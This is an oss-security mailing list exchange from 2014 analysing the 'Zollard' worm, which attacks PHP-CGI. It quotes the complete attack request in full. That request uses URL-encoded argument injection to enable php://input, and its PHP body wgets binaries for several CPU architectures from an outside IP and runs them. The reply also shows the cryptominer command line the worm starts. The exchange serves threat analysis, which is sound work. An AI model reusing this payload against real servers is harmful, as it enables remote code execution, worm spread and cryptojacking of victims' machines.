|
Date: Fri, 10 Oct 2014 21:55:06 +0200 From: Pierre Schweitzer <pierre@...ctos.org> To: oss-security@...ts.openwall.com Subject: Re: What does this PHP exploit do? -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dear Dave, Going quickly through the PHP script shows that it downloads lots of executables for various architectures to then try to run them (hence the chmod +x) on the host it was downloaded. So pretty portable worm. The executable it downloads appears to have two basic functions: - -> replicating itself over the network - -> starting a cryptocurrency miner (CPU miner) on the infected host Here is the way it starts the miner: ./minerd -q -B -a scrypt -o http://p2pool.org:5643 -u MDFepZz9SpSbFSugUsXVE3CmrdTaKg1SWi -p pass Cheers, Pierre On 10/10/2014 21:28, Dave Horsfall wrote: > My apologies if this is off-topic for this list, but out of all the > security lists of which I am a member this seems to be the closest > one that fits, so please point me to a more appropriate one in that > case.. > > I'm trying to figure out what this exploit does; it started around > the time that Shellshock did, but I don't think that they're > related. > > It downloads binaries for several architectures (even a MIPS) which > amongst other things futzes around with IPTABLES (including > blocking the TELNET port) and appears to be self-reproducing. > > The hex-encoded stuff in the script below decodes to > > "-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n" > > > but my PHP-fu doesn't quite extend that far (and that > "safe_mode=off" looks a bit suss). > > Script below, kindly supplied by 0wned boxes the world over (in > this case, Korea): > > POST > /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E > HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (compatible; > Zollard; Linux) Content-Type: application/x-www-form-urlencoded > Content-Length: 1817 Connection: close > > <?php echo "Zollard"; $disablefunc = > @ini_get("disable_functions"); if (!empty($disablefunc)) { > $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = > explode(",",$disablefunc); } function myshellexec($cmd) { global > $disablefunc; $result = ""; if (!empty($cmd)) { if > (is_callable("exec") and !in_array("exec",$disablefunc)) > {exec($cmd,$result); $result = join("\n",$result);} elseif > (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and > !in_array("system",$disablefunc)) {$v = @ob_get_contents(); > @ob_clean(); system($cmd); $result = @ob_get_contents(); > @ob_clean(); echo $v;} elseif (is_callable("passthru") and > !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); > @ob_clean(); passthru($cmd); $result = @ob_get_contents(); > @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) > { $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} > pclose($fp); } } return $result; } myshellexec("rm -rf > /tmp/armeabi;wget -P /tmp http://119.206.52.15:58455/armeabi;chmod > +x /tmp/armeabi"); myshellexec("rm -rf /tmp/arm;wget -P /tmp > http://119.206.52.15:58455/arm;chmod +x /tmp/arm"); myshellexec("rm > -rf /tmp/ppc;wget -P /tmp http://119.206.52.15:58455/ppc;chmod +x > /tmp/ppc"); myshellexec("rm -rf /tmp/mips;wget -P /tmp > http://119.206.52.15:58455/mips;chmod +x /tmp/mips"); > myshellexec("rm -rf /tmp/mipsel;wget -P /tmp > http://119.206.52.15:58455/mipsel;chmod +x /tmp/mipsel"); > myshellexec("rm -rf /tmp/x86;wget -P /tmp > http://119.206.52.15:58455/x86;chmod +x /tmp/x86"); myshellexec("rm > -rf /tmp/nodes;wget -P /tmp http://119.206.52.15:58455/nodes;chmod > +x /tmp/nodes"); myshellexec("rm -rf /tmp/sig;wget -P /tmp > http://119.206.52.15:58455/sig;chmod +x /tmp/sig"); > myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;"); > > -- Dave > - -- Pierre Schweitzer <pierre at reactos.org> System & Network Administrator Senior Kernel Developer ReactOS Deutschland e.V. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJUODmaAAoJEHVFVWw9WFsL+3oP/Aqok/rKbNXyZ63W3A9RALNa RVRDxh8WU7onJQjYoKgGO3uah1P42c1QCRA0wxVjfb1N0YS5IY7zp+LfEW4RKUyW ziBn15zHRo2o7AAgnFfAFOJ4A9XEpkPRTx41SZXSjJwuG6j9WzTeg0LyKBowerYu dsxETeYu7/TAAYCLT5i6TM+5g6RxIfEYRbX4MAQ8hP7/6PZF7Zc6pO+nZNBypxDt trEdWHIFjnEnMnlJVy6lbK05/6X0EdMf2cJhPxcGmXxcLMwg8gdsSfDlRCMBewGn NdtxDX4UnVBM0KvYmp6Wp5x+/Iow8n5F+sB07ZRnMRNJVajYB1gMR+aLzG/SjbHW eBNXPa599QaefoeVw94xwq0Zf9kGHbk0iyprD/nCu5Gsv80IUAkSmNWkzfpvPZST 9tXypLxXrOVZdyQUAhP6L5UYOMMMAddrcpCKSTtffzWP7TZEpkHA8xq+pRxMZwDJ 1llf8/jMyWwHMO61l5jkW+xMEhEy6gTjMsMYyvJ8y/jhPkOFB/C1xD0Y2vjrXBjp BC0PVuEIYN66Mr+LvnMzsO39oCnl1pJC/X3lru/e5eypEKhpDGEpnc0JpKokuyYT pgFw80BIrmy6q2dIhZX19whxD18ttlfW7sSp1nQ4BVeNO2wGuijbxOcNnmmJOnMu 5MBbzh8SuHo8I+kcgPN9 =NAuN -----END PGP SIGNATURE-----
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.